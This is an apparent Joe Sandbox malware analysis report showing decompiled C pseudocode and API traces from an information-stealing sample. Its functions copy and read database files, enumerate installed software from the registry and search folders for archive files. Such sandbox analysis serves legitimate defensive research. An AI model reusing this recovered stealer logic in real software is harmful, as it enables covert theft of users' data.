                                                                      • Part of subcall function 00412FC2: lstrcatA.KERNEL32(?,0043EAA0,?,?,?,?,?,?,?,?,?), ref: 00413037
                                                                      • Part of subcall function 00412FC2: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041304A
                                                                      • Part of subcall function 00412FC2: SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,?,?,?,?,?,?,?), ref: 00413058
                                                                      • Part of subcall function 00412FC2: _memset.LIBCMT ref: 00413069
                                                                      • Part of subcall function 00412FC2: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413077
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32(00000000), ref: 00413091
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130A8
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130BF
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130D6
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 004130ED
                                                                      • Part of subcall function 00412FC2: GetProcAddress.KERNEL32 ref: 00413104
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 004132D1
                                                                      • Part of subcall function 0040B63D: __EH_prolog3_GS.LIBCMT ref: 0040B644
                                                                      • Part of subcall function 0041048F: wsprintfA.USER32 ref: 004104D2
                                                                      • Part of subcall function 0041048F: FindFirstFileA.KERNEL32(?,?), ref: 004104E9
                                                                      • Part of subcall function 0041048F: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 0041050A
                                                                      • Part of subcall function 0041048F: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00410524
                                                                      • Part of subcall function 0041048F: wsprintfA.USER32 ref: 0041054B
                                                                      • Part of subcall function 0041048F: StrCmpCA.SHLWAPI(?), ref: 00410561
                                                                      • Part of subcall function 0041048F: FindNextFileA.KERNEL32(?,?), ref: 00410651
                                                                      • Part of subcall function 0041048F: FindClose.KERNEL32(?), ref: 00410665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$AddressProc$_memset$FileFind$EnvironmentLibraryVariablewsprintf$AttributesCloseFirstFolderFreeH_prolog3_LoadNextPath
                                                                    • String ID: ..\$.ini
                                                                    • API String ID: 2707205512-2443844595
                                                                    • Opcode ID: 3ab689e3c8d638d492200030f847672be8299ec36c4ffc3334e690cf4a5188cb
                                                                    • Instruction ID: 1f7035c71499a097c8672d82dd9660f64b80c44ebe973ff61bc42328851bffe5
                                                                    • Opcode Fuzzy Hash: 3ab689e3c8d638d492200030f847672be8299ec36c4ffc3334e690cf4a5188cb
                                                                    • Instruction Fuzzy Hash: F241F076D4021CABCF11DBA0DC4AEDEB77CAB0E711F5104A6B615D3090D6B896C88F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 47%
                                                                    			E0040E9B8(void* __ebx, CHAR* __ecx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t46;
                                                                    				void* _t54;
                                                                    				void* _t59;
                                                                    				void* _t62;
                                                                    				CHAR* _t63;
                                                                    				CHAR* _t64;
                                                                    				void* _t66;
                                                                    				char _t68;
                                                                    				CHAR* _t81;
                                                                    				char _t88;
                                                                    				CHAR* _t107;
                                                                    				CHAR* _t108;
                                                                    				void* _t109;
                                                                    				void* _t110;
                                                                    				void* _t111;
                                                                    				void* _t112;
                                                                    				void* _t113;
                                                                    
                                                                    				_t113 = __eflags;
                                                                    				_t105 = __edi;
                                                                    				_t87 = __ebx;
                                                                    				E0042083E(E00433CD7, __ebx, __edi, __esi);
                                                                    				 *(_t109 - 0x144) =  *(_t109 + 8);
                                                                    				 *((intOrPtr*)(_t109 - 0x148)) =  *((intOrPtr*)(_t109 + 0x10));
                                                                    				_t107 = __ecx;
                                                                    				E00426300(_t109 - 0x118, 0, 0x104);
                                                                    				_t111 = _t110 + 0xc;
                                                                    				lstrcatA(_t109 - 0x118,  *0x445fe0);
                                                                    				_t46 = 0x1a;
                                                                    				lstrcatA(_t109 - 0x118, E00415EF6(_t46, _t113));
                                                                    				CopyFileA(_t107, _t109 - 0x118, 1);
                                                                    				_t108 =  *0x445e0c; // 0x4c904b8
                                                                    				_t54 =  *0x446248(_t109 - 0x118, _t109 - 0x13c, 0x140);
                                                                    				if(_t54 == 0) {
                                                                    					_t59 =  *0x4461fc( *((intOrPtr*)(_t109 - 0x13c)), _t108, 0xffffffff, _t109 - 0x138, _t54);
                                                                    					_t112 = _t111 + 0x14;
                                                                    					if(_t59 == 0) {
                                                                    						_t62 =  *0x446218( *((intOrPtr*)(_t109 - 0x138)));
                                                                    						_t116 = _t62 - 0x64;
                                                                    						if(_t62 == 0x64) {
                                                                    							_t108 = 0x43c8dc;
                                                                    							do {
                                                                    								_t63 =  *0x446238( *((intOrPtr*)(_t109 - 0x138)), 0);
                                                                    								 *(_t109 - 0x140) = _t63;
                                                                    								_t64 =  *0x446238( *((intOrPtr*)(_t109 - 0x138)), 1);
                                                                    								_t112 = _t112 + 0x10;
                                                                    								_t105 = _t64;
                                                                    								_t66 =  *0x44622c( *((intOrPtr*)(_t109 - 0x138)), 2,  *0x446224( *((intOrPtr*)(_t109 - 0x138)), 2,  *((intOrPtr*)(_t109 + 0xc))));
                                                                    								_t88 = _t109 - 0x134;
                                                                    								E0040E874(_t88,  *((intOrPtr*)(_t109 - 0x148)), _t66, _t105, _t108, _t116);
                                                                    								 *(_t109 - 4) =  *(_t109 - 4) & 0x00000000;
                                                                    								_t68 =  *(_t109 - 0x134);
                                                                    								if( *((intOrPtr*)(_t109 - 0x120)) < 0x10) {
                                                                    									_t68 = _t88;
                                                                    								}
                                                                    								_t87 = 0x43c8d8;
                                                                    								_push(0x43c8d8);
                                                                    								_push(_t68);
                                                                    								if( *0x446458() != 0) {
                                                                    									L8:
                                                                    									lstrcatA( *0x446250, _t108);
                                                                    									lstrcatA( *0x446250,  *0x445e44);
                                                                    									lstrcatA( *0x446250,  *(_t109 - 0x144));
                                                                    									lstrcatA( *0x446250, _t108);
                                                                    									lstrcatA( *0x446250,  *0x446100);
                                                                    									lstrcatA( *0x446250,  *(_t109 - 0x140));
                                                                    									lstrcatA( *0x446250, _t108);
                                                                    									lstrcatA( *0x446250,  *0x445c48);
                                                                    									lstrcatA( *0x446250, _t105);
                                                                    									lstrcatA( *0x446250, _t108);
                                                                    									lstrcatA( *0x446250,  *0x4460c4);
                                                                    									_t81 =  *(_t109 - 0x134);
                                                                    									if( *((intOrPtr*)(_t109 - 0x120)) < 0x10) {
                                                                    										_t81 = _t109 - 0x134;
                                                                    									}
                                                                    									lstrcatA( *0x446250, _t81);
                                                                    									lstrcatA( *0x446250, "\n\n");
                                                                    								} else {
                                                                    									_push(0x43c8d8);
                                                                    									_push(_t105);
                                                                    									if( *0x446458() != 0) {
                                                                    										goto L8;
                                                                    									}
                                                                    								}
                                                                    								 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
                                                                    								E00404354(_t109 - 0x134, 1, 0);
                                                                    								_push( *((intOrPtr*)(_t109 - 0x138)));
                                                                    							} while ( *0x446218() == 0x64);
                                                                    						}
                                                                    					}
                                                                    					 *0x44621c( *((intOrPtr*)(_t109 - 0x138)));
                                                                    					 *0x44624c( *((intOrPtr*)(_t109 - 0x13c)));
                                                                    				}
                                                                    				DeleteFileA(_t109 - 0x118);
                                                                    				return E00420888(_t87, _t105, _t108);
                                                                    			}




















                                                                    0x0040eb12
                                                                    0x0040eb1b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040eb1b
                                                                    0x0040ec01
                                                                    0x0040ec0f
                                                                    0x0040ec14
                                                                    0x0040ec21
                                                                    0x0040ea8b
                                                                    0x0040ea80
                                                                    0x0040ec30
                                                                    0x0040ec3d
                                                                    0x0040ec43
                                                                    0x0040ec4b
                                                                    0x0040ec56

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040E9C2
                                                                    • _memset.LIBCMT ref: 0040E9E9
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040E9FE
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040EA14
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040EA24
                                                                    • DeleteFileA.KERNEL32(?,00000001), ref: 0040EC4B
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • StrCmpCA.SHLWAPI(?,0043C8D8), ref: 0040EB07
                                                                    • StrCmpCA.SHLWAPI(00000000,0043C8D8), ref: 0040EB13
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EB28
                                                                    • lstrcatA.KERNEL32 ref: 0040EB3A
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EB4C
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EB59
                                                                    • lstrcatA.KERNEL32 ref: 0040EB6B
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EB7D
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EB8A
                                                                    • lstrcatA.KERNEL32 ref: 0040EB9C
                                                                    • lstrcatA.KERNEL32(00000000), ref: 0040EBA9
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EBB6
                                                                    • lstrcatA.KERNEL32 ref: 0040EBC8
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EBEA
                                                                    • lstrcatA.KERNEL32(0043EC3C), ref: 0040EBFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileH_prolog3__memset$AllocCopyCountDeleteLocalTick_malloc_randwsprintf
                                                                    • String ID:
                                                                    • API String ID: 716014776-0
                                                                    • Opcode ID: 6f702660455b9da2d7edd8238bb6ec62255fd2c8991bb1a738964050cfd8bb74
                                                                    • Instruction ID: 3aa7885677a8f14d255b573e5d65b01072271cfaaefee0be4d254fd4dcdea25c
                                                                    • Opcode Fuzzy Hash: 6f702660455b9da2d7edd8238bb6ec62255fd2c8991bb1a738964050cfd8bb74
                                                                    • Instruction Fuzzy Hash: DA61173A500118AFDF216F60EC49ACEBB75FB0B321F1104B5F205A21B1DB759A94DF5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E00415007() {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t45;
                                                                    				long _t53;
                                                                    				char* _t78;
                                                                    				void* _t79;
                                                                    				void* _t82;
                                                                    				void* _t85;
                                                                    				void* _t88;
                                                                    				signed int _t89;
                                                                    				void* _t91;
                                                                    				void* _t92;
                                                                    
                                                                    				_t89 = _t91 - 0xba0;
                                                                    				_t92 = _t91 - 0xc20;
                                                                    				_t45 =  *0x443674; // 0x393162b1
                                                                    				 *(_t89 + 0xb9c) = _t45 ^ _t89;
                                                                    				 *(_t89 - 0x70) =  *(_t89 + 0xba8);
                                                                    				_t78 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
                                                                    				 *(_t89 - 0x74) = 0;
                                                                    				 *(_t89 - 0x6c) = 0;
                                                                    				 *(_t89 - 0x7c) = 0xf003f;
                                                                    				 *(_t89 - 0x68) = 0;
                                                                    				if(RegOpenKeyExA(0x80000002, _t78, 0, 0x20019, _t89 - 0x74) == 0) {
                                                                    					 *(_t89 - 0x78) = 0;
                                                                    					do {
                                                                    						 *(_t89 - 0x68) = 0x400;
                                                                    						_t53 = RegEnumKeyExA( *(_t89 - 0x74),  *(_t89 - 0x78), _t89 + 0x39c, _t89 - 0x68, 0, 0, 0, 0);
                                                                    						 *(_t89 - 0x80) = _t53;
                                                                    						if(_t53 != 0) {
                                                                    							goto L9;
                                                                    						} else {
                                                                    							wsprintfA(_t89 - 0x64, "%s\\%s", _t78, _t89 + 0x39c);
                                                                    							_t92 = _t92 + 0x10;
                                                                    							if(RegOpenKeyExA(0x80000002, _t89 - 0x64, 0, 0x20019, _t89 - 0x6c) != 0) {
                                                                    								RegCloseKey( *(_t89 - 0x6c));
                                                                    							} else {
                                                                    								 *(_t89 - 0x68) = 0x400;
                                                                    								if(RegQueryValueExA( *(_t89 - 0x6c), "DisplayName", 0, _t89 - 0x7c, _t89 + 0x79c, _t89 - 0x68) == 0) {
                                                                    									lstrcatA( *(_t89 - 0x70), _t89 + 0x79c);
                                                                    									 *(_t89 - 0x68) = 0x400;
                                                                    									if(RegQueryValueExA( *(_t89 - 0x6c), "DisplayVersion", 0, _t89 - 0x7c, _t89 + 0x79c, _t89 - 0x68) == 0) {
                                                                    										lstrcatA( *(_t89 - 0x70), " [");
                                                                    										lstrcatA( *(_t89 - 0x70), _t89 + 0x79c);
                                                                    										lstrcatA( *(_t89 - 0x70), "]");
                                                                    									}
                                                                    									lstrcatA( *(_t89 - 0x70), 0x43c8dc);
                                                                    								}
                                                                    								RegCloseKey( *(_t89 - 0x6c));
                                                                    								goto L9;
                                                                    							}
                                                                    						}
                                                                    						L12:
                                                                    						_t49 = RegCloseKey( *(_t89 - 0x74));
                                                                    						goto L13;
                                                                    						L9:
                                                                    						 *(_t89 - 0x78) =  *(_t89 - 0x78) + 1;
                                                                    					} while ( *(_t89 - 0x80) == 0);
                                                                    					goto L12;
                                                                    				}
                                                                    				L13:
                                                                    				_pop(_t85);
                                                                    				_pop(_t88);
                                                                    				_pop(_t79);
                                                                    				return E0041DA9B(_t49, _t79,  *(_t89 + 0xb9c) ^ _t89, _t82, _t85, _t88);
                                                                    			}

















                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,0043C8DC,?,00000000), ref: 00415056
                                                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00415083
                                                                    • wsprintfA.USER32 ref: 004150A5
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 004150BD
                                                                    • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,?,?,?), ref: 004150EA
                                                                    • lstrcatA.KERNEL32(?,?), ref: 004150FE
                                                                    • RegQueryValueExA.ADVAPI32(?,DisplayVersion,00000000,?,?,?), ref: 00415123
                                                                    • lstrcatA.KERNEL32(?,0043EC94), ref: 00415135
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415145
                                                                    • lstrcatA.KERNEL32(?,0043F4A8), ref: 00415153
                                                                    • lstrcatA.KERNEL32(?,0043C8DC), ref: 00415161
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041516A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00415181
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041518A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Close$OpenQueryValue$Enumwsprintf
                                                                    • String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                    • API String ID: 3722822016-3586320934
                                                                    • Opcode ID: 9fbb039184e97521e8e828ad7f7da5722b8a951149cd7d3fda9fdd26618aaa95
                                                                    • Instruction ID: 4836f0a002d8e5bdaed51ab035c3ea5cb6412ae6d96fa9fe31ca74597ecb6960
                                                                    • Opcode Fuzzy Hash: 9fbb039184e97521e8e828ad7f7da5722b8a951149cd7d3fda9fdd26618aaa95
                                                                    • Instruction Fuzzy Hash: 78412475900218AFDB229FA1DC48ADEBFBCEF1A715F20402AF909E7111D7745A48CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E00412D3C(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				CHAR* _t82;
                                                                    				intOrPtr* _t96;
                                                                    				WCHAR* _t102;
                                                                    				signed char _t103;
                                                                    				intOrPtr _t120;
                                                                    				intOrPtr _t127;
                                                                    				CHAR* _t129;
                                                                    				void* _t135;
                                                                    				intOrPtr _t137;
                                                                    				void* _t140;
                                                                    
                                                                    				_t127 = __edx;
                                                                    				_push(0x370);
                                                                    				E0042083E(E00434D9B, __ebx, __edi, __esi);
                                                                    				_t129 =  *0x445fb4; // 0x4c9a4c8
                                                                    				 *((intOrPtr*)(_t140 - 0x378)) =  *((intOrPtr*)(_t140 + 8));
                                                                    				 *((intOrPtr*)(_t140 - 0x374)) =  *((intOrPtr*)(_t140 + 0xc));
                                                                    				_t117 = 0;
                                                                    				 *(_t140 - 0x364) =  *(_t140 + 0x10);
                                                                    				 *((intOrPtr*)(_t140 - 0x36c)) = 0;
                                                                    				 *((intOrPtr*)(_t140 - 0x368)) = 0;
                                                                    				E00426300(_t140 - 0x220, 0, 0x104);
                                                                    				_t10 = _t140 - 0x328; // 0x41343d
                                                                    				E00426300(_t10, 0, 0x104);
                                                                    				lstrcatA(_t140 - 0x220, E00416617(0, _t129, 0x104, 0x1a));
                                                                    				lstrcatA(_t140 - 0x220, _t129);
                                                                    				lstrcatA(_t140 - 0x220,  *(_t140 - 0x364));
                                                                    				_push( *0x445fe4);
                                                                    				 *(_t140 - 0x370) = 0;
                                                                    				_push( *(_t140 - 0x364));
                                                                    				if( *0x446458() == 0) {
                                                                    					 *(_t140 - 0x370) = 1;
                                                                    				}
                                                                    				_push( *0x445ae4);
                                                                    				_push( *(_t140 - 0x364));
                                                                    				if( *0x446458() == 0) {
                                                                    					 *(_t140 - 0x370) = 2;
                                                                    				}
                                                                    				_t82 = E00416617(_t117, _t129, 0x104, 0x1a);
                                                                    				_t20 = _t140 - 0x328; // 0x41343d
                                                                    				lstrcatA(_t20, _t82);
                                                                    				_t21 = _t140 - 0x328; // 0x41343d
                                                                    				lstrcatA(_t21, _t129);
                                                                    				E00426300(_t140 - 0x118, _t117, 0x104);
                                                                    				lstrcatA(_t140 - 0x118, _t140 - 0x220);
                                                                    				lstrcatA(_t140 - 0x118, 0x43c8e0);
                                                                    				lstrcatA(_t140 - 0x118,  *0x445cec);
                                                                    				_t96 = _t140 - 0x118;
                                                                    				 *((intOrPtr*)(_t140 - 0x330)) = 0xf;
                                                                    				 *(_t140 - 0x334) = _t117;
                                                                    				 *(_t140 - 0x344) = _t117;
                                                                    				_t135 = _t96 + 1;
                                                                    				do {
                                                                    					_t120 =  *_t96;
                                                                    					_t96 = _t96 + 1;
                                                                    					_t148 = _t120 - _t117;
                                                                    				} while (_t120 != _t117);
                                                                    				E00404396(_t140 - 0x344, _t148, _t140 - 0x118, _t96 - _t135);
                                                                    				 *(_t140 - 4) = _t117;
                                                                    				_t102 = E004160E8(_t140 - 0x344, _t140 - 0x360);
                                                                    				if(_t102[0xa] >= 8) {
                                                                    					_t102 =  *_t102;
                                                                    				}
                                                                    				_t103 = GetFileAttributesW(_t102);
                                                                    				if(_t103 == 0xffffffff) {
                                                                    					L10:
                                                                    					 *(_t140 - 0x364) = _t117;
                                                                    					goto L11;
                                                                    				} else {
                                                                    					 *(_t140 - 0x364) = 1;
                                                                    					if((_t103 & 0x00000010) == 0) {
                                                                    						L11:
                                                                    						_t136 = _t140 - 0x360;
                                                                    						E0040C148(0, _t140 - 0x360, 1);
                                                                    						 *(_t140 - 4) =  *(_t140 - 4) | 0xffffffff;
                                                                    						E00404354(_t140 - 0x344, 1, _t117);
                                                                    						_t152 =  *(_t140 - 0x364) - _t117;
                                                                    						if( *(_t140 - 0x364) != _t117) {
                                                                    							_push(_t140 - 0x368);
                                                                    							_push(_t140 - 0x118);
                                                                    							if(E0040E6CB(_t117, _t140 - 0x36c, 0, _t136, _t152) == 0) {
                                                                    								E0040E631(_t140 - 0x36c, _t140 - 0x368);
                                                                    							}
                                                                    						}
                                                                    						_t137 =  *((intOrPtr*)(_t140 - 0x378));
                                                                    						E004101E9(_t137, _t127, 0x43c8d8, _t140 - 0x220,  *((intOrPtr*)(_t140 - 0x374)),  *((intOrPtr*)(_t140 - 0x36c)),  *((intOrPtr*)(_t140 - 0x368)),  *((intOrPtr*)(_t137 + 0x20)));
                                                                    						if( *((intOrPtr*)(_t137 + 6)) != _t117) {
                                                                    							_t117 =  *(_t140 - 0x370);
                                                                    							_t61 = _t140 - 0x328; // 0x41343d
                                                                    							E00412592( *(_t140 - 0x370), _t137, _t61,  *((intOrPtr*)(_t140 - 0x374)));
                                                                    						}
                                                                    						E0040E631(_t140 - 0x36c, _t140 - 0x368);
                                                                    						return E00420888(_t117, _t140 - 0x36c, _t140 - 0x368);
                                                                    					}
                                                                    					goto L10;
                                                                    				}
                                                                    			}














                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00412D46
                                                                    • _memset.LIBCMT ref: 00412D88
                                                                    • _memset.LIBCMT ref: 00412D99
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,00000370,0041343D,?), ref: 00412DB1
                                                                    • lstrcatA.KERNEL32(?,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412DBF
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,00000370,0041343D,?), ref: 00412DD2
                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412DEA
                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412E0A
                                                                    • lstrcatA.KERNEL32(=4A,00000000,?,?,?,00000370,0041343D,?), ref: 00412E2E
                                                                    • lstrcatA.KERNEL32(=4A,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412E3C
                                                                    • _memset.LIBCMT ref: 00412E4B
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E61
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E73
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E86
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412EE5
                                                                      • Part of subcall function 004101E9: wsprintfA.USER32 ref: 0041023C
                                                                      • Part of subcall function 004101E9: FindFirstFileA.KERNEL32(?,?), ref: 00410253
                                                                      • Part of subcall function 004101E9: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00410274
                                                                      • Part of subcall function 004101E9: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0041028E
                                                                      • Part of subcall function 004101E9: _sprintf.LIBCMT ref: 004102B5
                                                                      • Part of subcall function 004101E9: _memset.LIBCMT ref: 004102C8
                                                                      • Part of subcall function 004101E9: wsprintfA.USER32 ref: 004102F5
                                                                      • Part of subcall function 004101E9: StrCmpCA.SHLWAPI(?), ref: 0041030B
                                                                      • Part of subcall function 004101E9: FindNextFileA.KERNEL32(?,?), ref: 00410464
                                                                      • Part of subcall function 004101E9: FindClose.KERNEL32(?), ref: 00410478
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$FileFind$wsprintf$AttributesCloseFirstFolderH_prolog3_NextPath_sprintf
                                                                    • String ID: =4A
                                                                    • API String ID: 3931264267-1761815840
                                                                    • Opcode ID: 341711c0663573575b39ff4fe592647bdc371ab5b212e61f26e4495dfcfb2b1d
                                                                    • Instruction ID: bf2c21162eb632bb24620d173699f0e895dff840e7ab81d2a77476ccfc7dd78c
                                                                    • Opcode Fuzzy Hash: 341711c0663573575b39ff4fe592647bdc371ab5b212e61f26e4495dfcfb2b1d
                                                                    • Instruction Fuzzy Hash: 1A611DB2900228AFDF229F60DD89ADAB77CBB09314F0141EAE509A7151DB35ABC5CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?,00000000,0041C7C8,?,00000000,00000104,00000000), ref: 0041BC82
                                                                    • StrCmpCA.SHLWAPI(00000000,0043F6D4), ref: 0041BCAA
                                                                    • StrCmpCA.SHLWAPI(00000000,.zip), ref: 0041BCBE
                                                                    • StrCmpCA.SHLWAPI(00000000,.zoo), ref: 0041BCCE
                                                                    • StrCmpCA.SHLWAPI(00000000,.arc), ref: 0041BCDE
                                                                    • StrCmpCA.SHLWAPI(00000000,.lzh), ref: 0041BCEE
                                                                    • StrCmpCA.SHLWAPI(00000000,.arj), ref: 0041BCFE
                                                                    • StrCmpCA.SHLWAPI(00000000,.gz), ref: 0041BD0E
                                                                    • StrCmpCA.SHLWAPI(00000000,.tgz), ref: 0041BD1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                    • API String ID: 1659193697-51310709
                                                                    • Opcode ID: 67047d830c93c9611e09db2a4372ce4903fc30a4613be9600f17df625a583e12
                                                                    • Instruction ID: baa9e529bd40b5a6ed41b3c390d9594be1d0be8f3d5b79f03cfdf6aff9987c72
                                                                    • Opcode Fuzzy Hash: 67047d830c93c9611e09db2a4372ce4903fc30a4613be9600f17df625a583e12
                                                                    • Instruction Fuzzy Hash: CD1182346856612A9F211F206E4AFDF6754DF03B91B19102BF401A12A0EF5C98C797EE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E0040878A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				char* _t93;
                                                                    				char* _t94;
                                                                    				intOrPtr* _t107;
                                                                    				WCHAR* _t113;
                                                                    				signed char _t114;
                                                                    				void* _t121;
                                                                    				char* _t127;
                                                                    				char _t137;
                                                                    				char* _t139;
                                                                    				CHAR* _t140;
                                                                    				CHAR* _t147;
                                                                    				CHAR* _t151;
                                                                    				char _t154;
                                                                    				void* _t158;
                                                                    				intOrPtr _t160;
                                                                    				void* _t170;
                                                                    				void* _t175;
                                                                    				void* _t184;
                                                                    				void* _t192;
                                                                    				CHAR* _t197;
                                                                    				void* _t198;
                                                                    
                                                                    				_push(0x7cc);
                                                                    				E0042083E(E0043482B, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t198 - 0x7d8)) =  *((intOrPtr*)(_t198 + 8));
                                                                    				_t158 = 0x104;
                                                                    				 *(_t198 - 0x7d4) =  *(_t198 + 0xc);
                                                                    				_t184 = 0x104;
                                                                    				_t93 = _t198 - 0x224;
                                                                    				do {
                                                                    					 *_t93 = 0;
                                                                    					_t93 = _t93 + 1;
                                                                    					_t184 = _t184 - 1;
                                                                    				} while (_t184 != 0);
                                                                    				_t94 = _t198 - 0x11c;
                                                                    				do {
                                                                    					 *_t94 = 0;
                                                                    					_t94 = _t94 + 1;
                                                                    					_t158 = _t158 - 1;
                                                                    				} while (_t158 != 0);
                                                                    				_t154 = 0;
                                                                    				 *((intOrPtr*)(_t198 - 0x7c4)) = 0;
                                                                    				 *((intOrPtr*)(_t198 - 0x7c0)) = 0;
                                                                    				lstrcatA(_t198 - 0x224, E00416617(0, __edi, __esi, 0x1a));
                                                                    				lstrcatA(_t198 - 0x224,  *0x445d44);
                                                                    				lstrcatA(_t198 - 0x11c, _t198 - 0x224);
                                                                    				lstrcatA(_t198 - 0x11c, 0x43c8e0);
                                                                    				lstrcatA(_t198 - 0x11c,  *0x445cec);
                                                                    				_t107 = _t198 - 0x11c;
                                                                    				 *((intOrPtr*)(_t198 - 0x738)) = 0xf;
                                                                    				 *((intOrPtr*)(_t198 - 0x73c)) = 0;
                                                                    				 *((char*)(_t198 - 0x74c)) = 0;
                                                                    				_t192 = _t107 + 1;
                                                                    				do {
                                                                    					_t160 =  *_t107;
                                                                    					_t107 = _t107 + 1;
                                                                    					_t203 = _t160;
                                                                    				} while (_t160 != 0);
